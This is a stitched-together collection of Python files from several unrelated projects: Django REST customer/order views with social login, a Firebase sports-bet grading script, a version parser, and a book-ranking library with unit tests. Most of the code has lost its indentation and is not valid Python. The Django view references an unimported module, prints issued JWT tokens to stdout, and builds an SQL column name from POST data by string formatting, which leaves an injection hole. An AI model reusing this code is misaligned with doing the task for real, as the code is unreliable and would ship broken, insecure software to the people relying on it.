from rest_framework.decorators import api_view, permission_classes, authentication_classes
from django.contrib.auth.models import update_last_login
from django.http import JsonResponse
from requests.models import Response
from rest_framework import status
from rest_framework.generics import ListCreateAPIView, RetrieveUpdateDestroyAPIView
from rest_framework.permissions import AllowAny
from rest_framework.response import Response
from rest_framework.settings import api_settings
from rest_framework_jwt.settings import api_settings
from rest_framework.views import APIView
from social_core.backends.oauth import BaseOAuth1, BaseOAuth2
from social_core.exceptions import MissingBackend
from social_django.utils import load_backend, load_strategy
from rest_framework.permissions import IsAuthenticated
from rest_framework_jwt.authentication import JSONWebTokenAuthentication
from .models import Customer, Order
from .serializers import CustomerSerializer, OrderSerializer, UserLoginSerializer, UserSerializer, SocialAuthSerializer
JWT_PAYLOAD_HANDLER = api_settings.JWT_PAYLOAD_HANDLER
JWT_ENCODE_HANDLER = api_settings.JWT_ENCODE_HANDLER
@permission_classes((IsAuthenticated,))
@authentication_classes((JSONWebTokenAuthentication,))
class CustomerListCreateAPIView(ListCreateAPIView):
"""
API view to retrieve list of customers or create new
"""
serializer_class = CustomerSerializer
queryset = Customer.objects.all()
@permission_classes((IsAuthenticated,))
@authentication_classes((JSONWebTokenAuthentication,))
class CustomerDetailsAPIView(RetrieveUpdateDestroyAPIView):
"""
API view to retrieve, update or delete customer
"""
serializer_class = CustomerSerializer
queryset = Customer.objects.all()
@permission_classes((IsAuthenticated,))
@authentication_classes((JSONWebTokenAuthentication,))
class OrderListCreateAPIView(ListCreateAPIView):
"""
API view to retrieve list of orders or create new
"""
serializer_class = OrderSerializer
queryset = Order.objects.all()
@permission_classes((IsAuthenticated,))
@authentication_classes((JSONWebTokenAuthentication,))
class OrderDetailsAPIView(RetrieveUpdateDestroyAPIView):
"""
API view to retrieve, update or delete order
"""
serializer_class = OrderSerializer
queryset = Order.objects.all()
@permission_classes((IsAuthenticated,))
@authentication_classes((JSONWebTokenAuthentication,))
class CreateOrderAPIView(APIView):
serializer_class = OrderSerializer
    def post(self, request, customer_pk):
# customer_pk = request.data.get("customer_pk")
request.data['customer'] = customer_pk
serializer = OrderSerializer(data=request.data)
if serializer.is_valid():
order = serializer.save()
# data to return
customer = order.customer
serializer.data['customer'] = customer
return Response(serializer.data, status=status.HTTP_201_CREATED)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
@rest_framework.decorators.api_view(['POST'])
def social_login(request):
serializer_class = SocialAuthSerializer
serializer = serializer_class(data=request.data)
serializer.is_valid(raise_exception=True)
authenticated_user = request.user if not request.user.is_anonymous else None
provider = serializer.data.get('provider')
strategy = load_strategy(request)
try:
backend = load_backend(
strategy=strategy, name=provider, redirect_uri=None)
except MissingBackend:
return JsonResponse({"error": "Provider invalid or not supported"},
status=status.HTTP_404_NOT_FOUND)
if isinstance(backend, BaseOAuth1):
tokenn = {
'oauth_token': serializer.data.get('access_token'),
'oauth_token_secret': serializer.data.get('access_token_secret')
}
elif isinstance(backend, BaseOAuth2):
tokenn = serializer.data.get('access_token')
try:
user = backend.do_auth(tokenn, user=authenticated_user)
except BaseException as e:
return JsonResponse({"error": "Invalid credentials"}, status=status.HTTP_400_BAD_REQUEST)
if user:
user.is_verified = True
# user.token = function to generate token
payload = JWT_PAYLOAD_HANDLER(user)
jwt_token = JWT_ENCODE_HANDLER(payload)
user.tokenn = jwt_token
print("+" * 10)
print(jwt_token)
user.save()
update_last_login(None, user)
serializer = UserSerializer(user)
serializer.instance = user
# import pdb;pdb.set_trace()
return JsonResponse(serializer.data, status=status.HTTP_200_OK)
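# Hypothetical payload sketch for social_login (illustrative only; the provider value must be a backend
# name understood by social_core as configured in settings, which are not shown here):
#   POST {"provider": "<backend-name>", "access_token": "<token-from-provider>"}
#   OAuth1 backends additionally need "access_token_secret"; on success the view stores the issued JWT
#   on user.tokenn and returns the serialized user.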
@rest_framework.decorators.api_view(['GET', 'POST'])
def UserLoginView(request):
permission_classes = (AllowAny,)
serializer_class = UserLoginSerializer
serializer = serializer_class(data=request.data)
serializer.is_valid(raise_exception=True)
response = {
'success': 'True',
'status code': status.HTTP_200_OK,
'message': 'User logged in successfully',
'tokenn': serializer.data['tokenn'],
}
status_code = status.HTTP_200_OK
return Response(response, status=status_code)
``` |
{
"source": "1scotthp/swe-sports-scores-backend",
"score": 3
} |
#### File: 1scotthp/swe-sports-scores-backend/main.py
```python
from curses.ascii import NUL
from dataclasses import dataclass
from sqlite3 import Date
from jinja2 import Undefined
import requests
import json
import firebase_admin
from firebase_admin import credentials
from firebase_admin import db
from firebase_admin import firestore
from datetime import timedelta
import dataclasses
leagueDict = {
"basketball_nba": 7422,
"football_nfl": 0,
"football_ncaa": 0,
"basketball_ncaab": 7423,
"icehockey_nhl": 7588,
}
pageDict = {
"basketball_nba": 35
}
class EnhancedJSONEncoder(json.JSONEncoder):
def default(self, o):
if dataclasses.is_dataclass(o):
return dataclasses.asdict(o)
return super().default(o)
@dataclass
class Game:
home_team: str
home_score: str
away_team: str
away_score: str
date: Date
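# Minimal serialization sketch (illustrative only, not part of the original source):
#   g = Game(home_team="A", home_score="100", away_team="B", away_score="98", date="2022-01-01")
#   json.dumps(g, cls=EnhancedJSONEncoder)   # dataclasses are converted via dataclasses.asdict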
def load_data(sport: str):
url = "https://sportscore1.p.rapidapi.com/events/search"
tomorrow = Date.today() + timedelta(days=1)
yesterday = Date.today() - timedelta(days=1)
querystring = {"date_end": tomorrow, "date_start": yesterday, "status": "finished",
"league_id": leagueDict[sport]}
headers = {
'x-rapidapi-host': "sportscore1.p.rapidapi.com",
'x-rapidapi-key': "<KEY>"
}
response = requests.request(
"POST", url, headers=headers, params=querystring)
process_data(response.text, sport)
# writing to a file, should be writing to firebase?
# with open('json_data.json', 'w') as outfile:
# json.dump(response.text, outfile)
def process_data(d, sport):
#
# with open('json_data.json') as json_file:
# data = json.loads(json.load(json_file))["data"]
data = json.loads(d)["data"]
game_array = {}
i = 0
for game in data:
# print(game)
if game['status'] == 'finished':
g = Game(home_team=game['home_team']['name'], away_team=game['away_team']['name'],
home_score=game['home_score']['current'], away_score=game['away_score']['current'], date=game['start_at'])
game_array[i] = dataclasses.asdict(g)
i += 1
ref = db.reference('results/' + sport + "/")
ref.set(game_array)
## FOR RETURN VALUES
## first boolean is true if bet was graded
## second boolean is true if bet was correct
def grade_one_bet(results, bet):
# print("BET", bet, type(bet))
# print("RESULTS", type(results))
for game in results:
# print("GAME", results)
# print(json.loads(game), type(json.loads(game)))
if bet['winTeam'] == game['home_team'] and bet['loseTeam'] == game['away_team']:
if game['home_score'] > game['away_score']: # correct
return True, True
else: # incorrect
return True, False
elif bet['winTeam'] == game['away_team'] and bet['loseTeam'] == game['home_team']:
if game['home_score'] < game['away_score']: # correct
return True, True
else: # incorrect
return True, False
else:
return False, False
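# Hypothetical call sketch (illustrative only; team names are made up):
#   graded, correct = grade_one_bet(results, {"winTeam": "Knicks", "loseTeam": "Nets"})
#   (see the return-value notes above: first flag = bet graded, second flag = bet correct)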
def grade_bets(sport):
ref = db.reference('results/' + sport + "/")
results = ref.get()
db_firestore = firestore.client()
docs = db_firestore.collection(u'users').stream()
i = 0
for doc in docs:
user = doc.to_dict()
open_bets = user["open_bets"] # get all bets for a user
streak = user["streak"] if "streak" in user.keys() else 0
i+=1
still_open_bets = []
new_graded_bets = []
new_wins = 0
new_losses = 0
for bet in open_bets: # check to see if the game happened
graded = False
if results is not None:
# go over all result games for every game we are grading
for game in results:
if bet['win'] == game['home_team'] and bet['lose'] == game['away_team']:
if game['home_score'] > game['away_score']: # correct
new_wins += 1
streak = calculate_streak(streak, 1)
else: # incorrect
new_losses += 1
streak = calculate_streak(streak, -1)
graded = True
break
elif bet['win'] == game['away_team'] and bet['lose'] == game['home_team']:
if game['home_score'] < game['away_score']: # correct
new_wins += 1
streak = calculate_streak(streak, 1)
else: # incorrect
new_losses += 1
streak = calculate_streak(streak, -1)
graded = True
break
if not graded:
still_open_bets.append(bet)
else:
new_graded_bets.append(bet)
userRef = db_firestore.collection(u'users').document(doc.id)
if new_wins > -1 or new_losses > 0:
newUser = {
"open_bets": still_open_bets,
"graded_bets": user["graded_bets"] + new_graded_bets,
"losses": user["losses"] + new_losses,
"wins": user["wins"] + new_wins,
"username": user['username'],
"phoneNumber": user['phoneNumber'],
"group_chats": user["group_chats"],
"streak": streak
}
userRef.set(
newUser
)
# this could already be in a designated place; yeah, that's actually way better
ref = db.reference('chats/public/')
allChats = ref.get()
graded_bets = []
still_active_bets = []
for chat in allChats:
for data in allChats[chat]:
if data == "picks":
if "active" in allChats[chat][data] and results != None:
for bet in allChats[chat][data]["active"]:
print(grade_one_bet(bet=allChats[chat][data]["active"][bet], results=results))
# based on return values update the active/completed bets in a group chat
#
# go through the active picks and maybe move them over
# if results[chat] != None:
# for message in results[chat]["picks"]["active"]:
# print(message, results[chat]["picks"]["active"][message])
cred = credentials.Certificate(
"swe-sports-firebase-firebase-adminsdk-9lnlp-54450378e3.json")
firebase_admin.initialize_app(cred, {
'databaseURL': 'https://swe-sports-firebase-default-rtdb.firebaseio.com/'
})
def load_all():
sport_arr = ["basketball_nba", "icehockey_nhl"]
for s in sport_arr:
load_data(s)
# process_data(s)
def grade_all():
sport_arr = ["basketball_nba", "icehockey_nhl", "basketball_ncaab"]
for s in sport_arr:
grade_bets(s)
def calculate_streak(streak, operation):
"""
Params:
streak: current user's streak
operation: 1 if bet hits, -1 if bet doesn't hit
If streak is positive and bet hits it will increment streak
If streak is negative and bet hits it will assign it 1
If streak is positive and bet misses it will assign it -1
If streak is negative and bet misses it will decrement streak
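Worked examples (illustrative):
calculate_streak(3, 1)   -> 4    (win extends a positive streak)
calculate_streak(-2, 1)  -> 1    (win after losses restarts at 1)
calculate_streak(2, -1)  -> -1   (loss after wins restarts at -1)
calculate_streak(-2, -1) -> -3   (loss extends a negative streak)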
"""
return operation if (streak * operation) < 0 else (streak + operation)
def main(event, context):
# load_all()
grade_all()
if __name__ == '__main__':
main(1, 1)
``` |
{
"source": "1set/but",
"score": 3
} |
#### File: full/script/utils.py
```python
import re
import sys
pattern_flag = re.IGNORECASE
pattern_map = {
"go": re.compile(r"go(\d+)\.(\d+)(\.(\d+))?\s", pattern_flag),
"python": re.compile(r"^Python\s+(\d+)\.(\d+)(\.(\d+))?$", pattern_flag),
"pip": re.compile(r"^pip\s+(\d+)\.(\d+)(\.(\d+))?\s", pattern_flag),
"node": re.compile(r"^v(\d+)\.(\d+)(\.(\d+))?$", pattern_flag),
"npm": re.compile(r"^(\d+)\.(\d+)(\.(\d+))?$", pattern_flag),
}
def version_string(version):
if version is None:
return ""
return str.join(".", [str(n) for n in version])
def extract_version(lang, raw):
if lang not in pattern_map:
return None
pattern = pattern_map[lang]
found = pattern.search(raw)
if found is None:
return None
match = found.groups()
version = []
for s in match:
if s is not None and not s.startswith("."):
version.append(int(s))
return tuple(version)
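# Examples (illustrative only; the input strings mimic typical version-command output):
#   extract_version("go", "go version go1.16.3 linux/amd64")   # -> (1, 16, 3)
#   extract_version("node", "v14.17.0")                        # -> (14, 17, 0)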
def parse_version_from_stdin():
# read from stdin
lines = []
for line in sys.stdin:
lines.append(line.strip())
# parse all lines
versions = {}
for l in lines:
parts = l.split(":", 1)
lang = parts[0].lower()
raw_version = parts[1].strip()
version = extract_version(lang, raw_version)
if version is not None and len(version) >= 1:
versions[lang] = version
return versions
``` |
{
"source": "1shooperman/gr-sorter",
"score": 3
} |
#### File: sorter/lib/asset_handler.py
```python
import os
def asset(asset_path):
'''
Get the file contents and header_type
return (file contents as string, headers)
'''
asset_file = os.path.abspath(asset_path)
if os.path.isfile(asset_file) is True:
if '.js' in asset_path:
header_type = 'application/javascript; charset=utf-8'
elif '.css' in asset_path:
header_type = 'text/css; charset=utf-8'
else:
header_type = 'text/plain; charset=utf-8'
with open(asset_file, 'r') as myfile:
data = myfile.read()
myfile.close()
else:
data = None
header_type = 'text/plain; charset=utf-8'
return (data, header_type)
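# Usage sketch (illustrative only; the path is hypothetical):
#   body, content_type = asset('static/app.js')
#   content_type == 'application/javascript; charset=utf-8' when the file exists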
```
#### File: sorter/lib/bootstrap.py
```python
import os
from sorter.lib.first_run import init
def bootstrap(db_name, logger):
'''
Bootstrap the application / db / etc
'''
db_file = os.path.abspath(db_name)
if os.path.isfile(db_file) is False:
logger.info('First run, initializing application')
init(db_file)
return db_file
```
#### File: sorter/lib/data_handler.py
```python
import os
from sorter.lib.db import DB
from sorter.lib.book_utils import get_by_id, get_by_isbn
from sorter.lib.parse_xml import parse_isbn13_response, parse_id_response
def store_data(books, db_file):
'''
Store the book data in the provided database
'''
database = DB(db_file)
database.create_connection()
query = '''INSERT INTO rankings(id, isbn, isbn13, title,
image_url, publication_year, ratings_count, average_rating,
author, link) VALUES(?,?,?,?,?,?,?,?,?,?)'''
for book in books:
database.insertupdate(query, book)
database.close_connection()
def get_books(db_file):
'''
Get the previously stored books data
'''
database = DB(db_file)
database.create_connection()
books = database.query('select * from rankings')
database.close_connection()
return books
def get_books_with_missing_data(db_file):
'''
Get the previously stored books data
'''
database = DB(db_file)
database.create_connection()
books = database.query('select * from rankings where publication_year is null')
database.close_connection()
return books
def dump_data(db_file):
'''
Delete the provided data file
'''
if os.path.isfile(db_file):
os.remove(db_file)
def clean_data(db_name, defaults):
'''
Plug in missing data:
book[0] = ID
book[1] = ISBN
book[2] = ISBN13
book[3] = title
book[4] = image url
book[5] = pub year
book[6] = Total Ratings
book[7] = avg rating
book[8] = author
book[9] = link
'''
db_file = os.path.abspath(db_name)
if os.path.isfile(db_file):
books = get_books_with_missing_data(db_file)
map(update_book, books, ([db_file] * len(books)), ([defaults] * len(books)))
def update_book(book, db_file, defaults):
'''
Add the missing book data
'''
qry = None
if book[2] is not None:
xml_response = get_by_isbn(book[2], defaults)
new_book = parse_isbn13_response(xml_response)
qry = 'UPDATE rankings set publication_year = ? where isbn13 = ?'
vals = [new_book[5], book[2]]
elif book[0] is not None:
xml_response = get_by_id(book[0], defaults)
new_book = parse_id_response(xml_response)
qry = 'UPDATE rankings set publication_year = ?, isbn = ?, isbn13 = ? where id = ?'
vals = [new_book[5], new_book[1], new_book[2], book[0]]
if qry is not None:
database = DB(db_file)
database.create_connection()
database.insertupdate(qry, vals)
database.close_connection()
def manually_update_books(data, db_file):
'''
Update books based on parsed POST data
'''
database = DB(db_file)
database.create_connection()
for book in data:
if book['attr'] == 'id':
continue
qry = 'UPDATE rankings set %s = ? where id = ?' % book['attr']
vals = [book['value'], int(book['book_id'])]
database.insertupdate(qry, vals)
database.close_connection()
```
#### File: tests/unit/test_data_handler.py
```python
from sorter.lib.data_handler import *
import sqlite3
from sorter.lib.defaults import Defaults
defaults = Defaults('FOO_KEY', 1, ['BAR-SHELF'])
CREATE_RANKINGS = '''CREATE TABLE rankings
(id PRIMARY KEY, isbn UNIQUE, isbn13 UNIQUE, title, image_url,
publication_year INTEGER, ratings_count INTEGER, average_rating FLOAT,
author, link, preference_adjustment FLOAT DEFAULT 0.0)'''
class fake_os(object):
def __init__(self):
self.called_remove = None
def remove(self, file):
self.called_remove = file
class fake_db(object):
def __init__(self, foo):
self.conn = foo
def create_connection(self):
pass
def insertupdate(self, foo, bar):
pass
def close_connection(self):
pass
def query(self):
pass
class wrapped_db(object):
def __init__(self, database):
self.database = database
def create_connection(self):
pass
def insertupdate(self, query, vals):
self.database.insertupdate(query, vals)
def close_connection(self):
pass
def query(self):
pass
class fake_data_handler(object):
def __init__(self):
self.called_get_books_with_missing_data = False
self.called_update_book = False
self.called_get_by_isbn = False
self.called_parse_isbn13_response = False
self.called_get_by_id = False
self.called_parse_id_response = False
def get_books_with_missing_data(self, *args):
self.called_get_books_with_missing_data = True
return [[1],[2],[3],[4],[5]]
def update_book(self, *args):
self.called_update_book = True
return None
def get_by_isbn(self, *args):
self.called_get_by_isbn = True
def parse_isbn13_response(self, *args):
self.called_parse_isbn13_response = True
def get_by_id(self, *args):
self.called_get_by_id = True
def parse_id_response(self, *args):
self.called_parse_id_response = True
class TestDataHandler(object):
def test_store_data(self, monkeypatch):
database = sqlite3.connect(':memory:')
qry = CREATE_RANKINGS
database.execute(qry)
monkeypatch.setattr("sorter.lib.data_handler.DB", fake_db)
monkeypatch.setattr("sorter.lib.data_handler.DB.create_connection", lambda foo: database)
monkeypatch.setattr("sorter.lib.data_handler.DB.insertupdate", lambda self, foo, bar: database.execute(foo,bar))
fake_data = [(1,2,3,4,5,6,7,8,9,10)]
store_data(fake_data, "foo")
fake_data_returned = database.execute("select * from rankings").fetchall()
database.close()
database = None
assert [fake_data[0] + (0.0,)] == fake_data_returned
def test_get_books(self, monkeypatch):
database = sqlite3.connect(':memory:')
qry = CREATE_RANKINGS
database.execute(qry)
monkeypatch.setattr("sorter.lib.data_handler.DB", fake_db)
monkeypatch.setattr("sorter.lib.data_handler.DB.create_connection", lambda foo: database)
monkeypatch.setattr("sorter.lib.data_handler.DB.query", lambda self, foo: database.execute(foo).fetchall())
fake_book = (1,2,3,4,5,6,7,8,9,10,1.2)
query = '''INSERT INTO rankings(id, isbn, isbn13, title,
image_url, publication_year, ratings_count, average_rating,
author, link, preference_adjustment) VALUES(?,?,?,?,?,?,?,?,?,?,?)'''
database.execute(query, fake_book)
fake_data_returned = get_books("foo")
database.close()
database = None
assert fake_data_returned == [fake_book]
def test_dump_data(self, monkeypatch):
faker = fake_os()
monkeypatch.setattr("sorter.lib.data_handler.os.remove", lambda file: faker.remove(file))
monkeypatch.setattr("sorter.lib.data_handler.os.path.isfile", lambda file: True)
dump_data("fake.file")
assert faker.called_remove == "fake.file"
def test_get_books_with_missing_data(self, monkeypatch):
database = sqlite3.connect(':memory:')
qry = CREATE_RANKINGS
database.execute(qry)
monkeypatch.setattr("sorter.lib.data_handler.DB", fake_db)
monkeypatch.setattr("sorter.lib.data_handler.DB.create_connection", lambda foo: database)
monkeypatch.setattr("sorter.lib.data_handler.DB.query", lambda self, foo: database.execute(foo).fetchall())
fake_books = [(1,2,3,4,5,6,7,8,9,10),
(11,12,13,14,15,None,17,18,19,20),
(21,22,23,24,25,26,27,28,29,30),
(31,32,33,34,35,None,37,38,39,40)]
query = '''INSERT INTO rankings(id, isbn, isbn13, title,
image_url, publication_year, ratings_count, average_rating,
author, link) VALUES(?,?,?,?,?,?,?,?,?,?)'''
for fake_book in fake_books:
database.execute(query, fake_book)
fake_data_returned = get_books_with_missing_data("foo")
database.close()
database = None
assert fake_data_returned == [fake_books[1] + (0.0,), fake_books[3] + (0.0,)]
def test_clean_data(self, monkeypatch):
fdh = fake_data_handler()
monkeypatch.setattr('sorter.lib.data_handler.os.path.abspath', lambda *args: "Foo")
monkeypatch.setattr('sorter.lib.data_handler.os.path.isfile', lambda *args: True)
monkeypatch.setattr('sorter.lib.data_handler.update_book', fdh.update_book)
monkeypatch.setattr('sorter.lib.data_handler.get_books_with_missing_data', fdh.get_books_with_missing_data)
clean_data('Bar', defaults)
assert fdh.called_get_books_with_missing_data is True
assert fdh.called_update_book is True
def test_update_book_given_isbn(self, monkeypatch):
fdh = fake_data_handler()
monkeypatch.setattr('sorter.lib.data_handler.get_by_isbn', fdh.get_by_isbn)
monkeypatch.setattr('sorter.lib.data_handler.parse_isbn13_response', lambda *args: (11,12,13,14,15,4242,17,18,19,20))
monkeypatch.setattr('sorter.lib.data_handler.get_by_id', fdh.get_by_id)
monkeypatch.setattr('sorter.lib.data_handler.parse_id_response', fdh.parse_id_response)
from sorter.lib.db import DB
database = DB(':memory:')
database.create_connection()
monkeypatch.setattr("sorter.lib.data_handler.DB", lambda *args: wrapped_db(database))
qry = CREATE_RANKINGS
database.execute(qry)
fake_books = [( 1, 2, 3, 4, 5, 6, 7, 8, 9,10),
(11,12,13,14,15,16,17,18,19,20),
(21,22,23,24,25,26,27,28,29,30),
(31,32,33,34,35,36,37,38,39,40)]
query = '''INSERT INTO rankings(id, isbn, isbn13, title,
image_url, publication_year, ratings_count, average_rating,
author, link) VALUES(?,?,?,?,?,?,?,?,?,?)'''
for fake_book in fake_books:
database.insertupdate(query, fake_book)
update_book((11,12,13,14,15,16,17,18,19,20), 'foo', defaults)
test_books = database.query('select * from rankings where id = 11')
database.close_connection()
database = None
assert test_books[0][0] == 11
assert test_books[0][1] == 12
assert test_books[0][2] == 13
assert test_books[0][3] == 14
assert test_books[0][4] == 15
assert test_books[0][5] == 4242
assert test_books[0][6] == 17
assert test_books[0][7] == 18
assert test_books[0][8] == 19
assert test_books[0][9] == 20
assert fdh.called_get_by_isbn is True
assert fdh.called_get_by_id is False
assert fdh.called_parse_id_response is False
def test_update_book_given_id(self, monkeypatch):
fdh = fake_data_handler()
monkeypatch.setattr('sorter.lib.data_handler.get_by_isbn', fdh.get_by_isbn)
monkeypatch.setattr('sorter.lib.data_handler.parse_isbn13_response', fdh.parse_isbn13_response)
monkeypatch.setattr('sorter.lib.data_handler.get_by_id', fdh.get_by_id)
monkeypatch.setattr('sorter.lib.data_handler.parse_id_response', lambda *args: (1,999,9999,4,5,1942,7,8,9,10))
from sorter.lib.db import DB
database = DB(':memory:')
database.create_connection()
monkeypatch.setattr("sorter.lib.data_handler.DB", lambda *args: wrapped_db(database))
qry = CREATE_RANKINGS
database.execute(qry)
fake_books = [( 1, 2, 3, 4, 5, 6, 7, 8, 9,10),
(11,12,13,14,15,16,17,18,19,20),
(21,22,23,24,25,26,27,28,29,30),
(31,32,33,34,35,36,37,38,39,40)]
query = '''INSERT INTO rankings(id, isbn, isbn13, title,
image_url, publication_year, ratings_count, average_rating,
author, link) VALUES(?,?,?,?,?,?,?,?,?,?)'''
for fake_book in fake_books:
database.insertupdate(query, fake_book)
update_book((1,None,None,4,5,6,7,8,9,10), 'foo', defaults)
test_books = database.query('select * from rankings where id = 1')
database.close_connection()
database = None
assert test_books[0][0] == 1
assert test_books[0][1] == 999
assert test_books[0][2] == 9999
assert test_books[0][3] == 4
assert test_books[0][4] == 5
assert test_books[0][5] == 1942
assert test_books[0][6] == 7
assert test_books[0][7] == 8
assert test_books[0][8] == 9
assert test_books[0][9] == 10
assert fdh.called_get_by_isbn is False
assert fdh.called_parse_isbn13_response is False
assert fdh.called_get_by_id is True
def test_manually_update_book_all_fields(self, monkeypatch):
from sorter.lib.db import DB
database = DB(':memory:')
database.create_connection()
monkeypatch.setattr("sorter.lib.data_handler.DB", lambda *args: wrapped_db(database))
qry = CREATE_RANKINGS
database.execute(qry)
fake_books = [( 1, 2, 3, 4, 5, 6, 7, 8, 9,10),
(11,12,13,14,15,16,17,18,19,20),
(21,22,23,24,25,26,27,28,29,30),
(31,32,33,34,35,36,37,38,39,40)]
query = '''INSERT INTO rankings(id, isbn, isbn13, title,
image_url, publication_year, ratings_count, average_rating,
author, link) VALUES(?,?,?,?,?,?,?,?,?,?)'''
for fake_book in fake_books:
database.insertupdate(query, fake_book)
to_update = [
{
'book_id': 1,
'attr': 'isbn',
'value': 'foo'
},
{
'book_id': 1,
'attr': 'isbn13',
'value': 'bar'
},
{
'book_id': 1,
'attr': 'title',
'value': 'baz'
},
{
'book_id': 1,
'attr': 'image_url',
'value': 'bang'
},
{
'book_id': 1,
'attr': 'publication_year',
'value': 1980
},
{
'book_id': 1,
'attr': 'ratings_count',
'value': 56
},
{
'book_id': 1,
'attr': 'average_rating',
'value': 57
},
{
'book_id': 1,
'attr': 'author',
'value': 'ipsum'
},
{
'book_id': 1,
'attr': 'link',
'value': 'dolet'
},
{
'book_id': 1,
'attr': 'preference_adjustment',
'value': 12
},
{
'book_id': 11,
'attr': 'ISBN13',
'value': 'brown'
}
]
manually_update_books(to_update, 'foo')
test_books = database.query('select * from rankings where id in (1,11,21,31)')
database.close_connection()
database = None
assert test_books[0] == (1, 'foo', 'bar', 'baz', 'bang', 1980, 56, 57, 'ipsum', 'dolet', 12.0)
assert test_books[1] == (11,12,'brown',14,15,16,17,18,19,20,0.0)
assert test_books[2] == (21,22,23,24,25,26,27,28,29,30,0.0)
assert test_books[3] == (31,32,33,34,35,36,37,38,39,40,0.0)
def test_manually_update_book_id_noupdate(self, monkeypatch):
from sorter.lib.db import DB
database = DB(':memory:')
database.create_connection()
monkeypatch.setattr("sorter.lib.data_handler.DB", lambda *args: wrapped_db(database))
qry = CREATE_RANKINGS
database.execute(qry)
fake_books = [( 1, 2, 3, 4, 5, 6, 7, 8, 9,10)]
query = '''INSERT INTO rankings(id, isbn, isbn13, title,
image_url, publication_year, ratings_count, average_rating,
author, link) VALUES(?,?,?,?,?,?,?,?,?,?)'''
for fake_book in fake_books:
database.insertupdate(query, fake_book)
to_update = [
{
'book_id': 1,
'attr': 'id',
'value': 'foo'
}
]
manually_update_books(to_update, 'foo')
test_books = database.query('select * from rankings where id = 1')
database.close_connection()
database = None
assert test_books[0] == (1, 2, 3, 4, 5, 6, 7, 8, 9, 10,0.0)
```
#### File: tests/unit/test_defaults.py
```python
import tempfile
import os
from urlparse import parse_qs, urlsplit
from sorter.lib.defaults import Defaults
class TestDefaults(object):
def test_get_book_url(self):
defaults = Defaults('http://FAKE.GLTD')
api_url = defaults.get_book_url(12345, 'http://FAKE.GLTD/FAKER?id=%s&key=%s')
_, _, path, query, _ = urlsplit(api_url)
params = parse_qs(query)
assert params['id'][0] == '12345'
assert params['key'][0] == 'None'
def test_get_search_url(self):
defaults = Defaults('http://FAKE.GLTD')
api_url = defaults.get_search_url(54321, 'http://FAKE.GLTD/FAKER?isbn=%s&key=%s')
_, _, path, query, _ = urlsplit(api_url)
params = parse_qs(query)
assert params['isbn'][0] == '54321'
assert params['key'][0] == 'None'
def test_get_book_url_nouri(self):
defaults = Defaults('http://FAKE.GLTD')
api_url = defaults.get_book_url(12345)
_, _, path, query, _ = urlsplit(api_url)
assert path == "/book/show/12345.xml"
assert query == "key=None"
def test_get_search_url_nouri(self):
defaults = Defaults('http://FAKE.GLTD')
api_url = defaults.get_search_url(54321)
_, _, path, query, _ = urlsplit(api_url)
assert path == "/search"
assert query == "q=54321&format=xml&key=None"
def test_is_test(self, monkeypatch):
defaults = Defaults('http://FAKE.GLTD', 'FOO_KEY')
monkeypatch.setattr('os.environ', {'WEBPY_END': 'foo'})
bar = Defaults.is_test()
assert bar is False
def test_get_list_url(self):
defaults = Defaults('http://FAKE.GLTD')
api_url = defaults.get_list_url(98765, ['foo-shelf'], 9, 'http://FAKE.GLTD/FAKER?user_id=%s&key=%s&shelf=%s&per_page=%s')
_, _, path, query, _ = urlsplit(api_url)
params = parse_qs(query)
assert params['user_id'][0] == '98765'
assert params['key'][0] == 'None'
assert params['shelf'][0] == 'foo-shelf'
assert params['per_page'][0] == '9'
def test_get_list_url_noshelves(self):
defaults = Defaults('http://FAKE.GLTD', None, None, ['bar-shelf'])
api_url = defaults.get_list_url(98765, None, 9, 'http://FAKE.GLTD/FAKER?user_id=%s&key=%s&shelf=%s&per_page=%s')
_, _, path, query, _ = urlsplit(api_url)
params = parse_qs(query)
assert params['user_id'][0] == '98765'
assert params['key'][0] == 'None'
assert params['shelf'][0] == 'bar-shelf'
assert params['per_page'][0] == '9'
def test_get_list_url_noperpage(self):
defaults = Defaults('http://FAKE.GLTD', None, 42)
api_url = defaults.get_list_url(98765, ['foo-shelf'], None, 'http://FAKE.GLTD/FAKER?user_id=%s&key=%s&shelf=%s&per_page=%s')
_, _, path, query, _ = urlsplit(api_url)
params = parse_qs(query)
assert params['user_id'][0] == '98765'
assert params['key'][0] == 'None'
assert params['shelf'][0] == 'foo-shelf'
assert params['per_page'][0] == '42'
def test_get_list_url_nouri(self):
defaults = Defaults('http://FAKE.GLTD/')
api_url = defaults.get_list_url(98765, ['foo-shelf'], 9, None)
_, _, path, query, _ = urlsplit(api_url)
params = parse_qs(query)
assert '98765.xml' in path
assert params['key'][0] == 'None'
assert params['shelf'][0] == 'foo-shelf'
assert params['per_page'][0] == '9'
def test_getset_key(self):
defaults = Defaults('FAKER.GTLD', 'FOO_KEY')
assert defaults.get_key() == 'FOO_KEY'
def test_get_shelf_url(self):
defaults = Defaults('http://FAKER.GLTD', 'FOO_KEY')
assert defaults.get_shelf_url() == 'http://FAKER.GLTD/shelf/list.xml?key=FOO_KEY'
```
#### File: tests/unit/test_rank.py
```python
from sorter.lib.rank import rank, score_book, get_total_ratings
class TestRank(object):
def test_rank(self, monkeypatch):
monkeypatch.setattr("sorter.lib.rank.score_book", lambda foo, bar: foo[0])
monkeypatch.setattr("sorter.lib.rank.get_total_ratings", lambda foo: 1234)
fake_data = [
(1,2,3,4,5,6,7,8,9,10,0.02),
(9,8,7,6,5,4,3,2,1,10,0.01)
]
ranked_fake_data = rank(fake_data)
assert ranked_fake_data == [
(9,8,7,6,5,4,3,2,1,10,0.01,9),
(1,2,3,4,5,6,7,8,9,10,0.02,1)
]
def test_score_book(self):
fake_data = (1,2,3,4,5,6,7,8,9,10,0.2)
foo = score_book(fake_data, 100)
assert foo == 216.0
def test_score_book_bad_year(self, monkeypatch):
logger = FAKE_LOGGER()
monkeypatch.setattr('sorter.lib.rank.LOGGER', logger)
fake_data = (1,2,3,4,5,None,7,8,9,None,0.1)
foo = score_book(fake_data, 100)
assert foo == 136.0
assert logger.called_warn == True
def test_score_book_bad_ratings(self, monkeypatch):
logger = FAKE_LOGGER()
monkeypatch.setattr('sorter.lib.rank.LOGGER', logger)
fake_data = (1,2,3,4,5,6,None,8,9,None,0.2)
foo = score_book(fake_data, 100)
assert foo == 160.0
assert logger.called_warn == True
def test_score_book_bad_avg_ratings(self, monkeypatch):
logger = FAKE_LOGGER()
monkeypatch.setattr('sorter.lib.rank.LOGGER', logger)
fake_data = (1,2,3,4,5,6,7,None,9,None,0.3)
foo = score_book(fake_data, 100)
assert foo == 0.0
assert logger.called_warn == True
def test_score_book_bad_isbn_and_year(self, monkeypatch):
logger = FAKE_LOGGER()
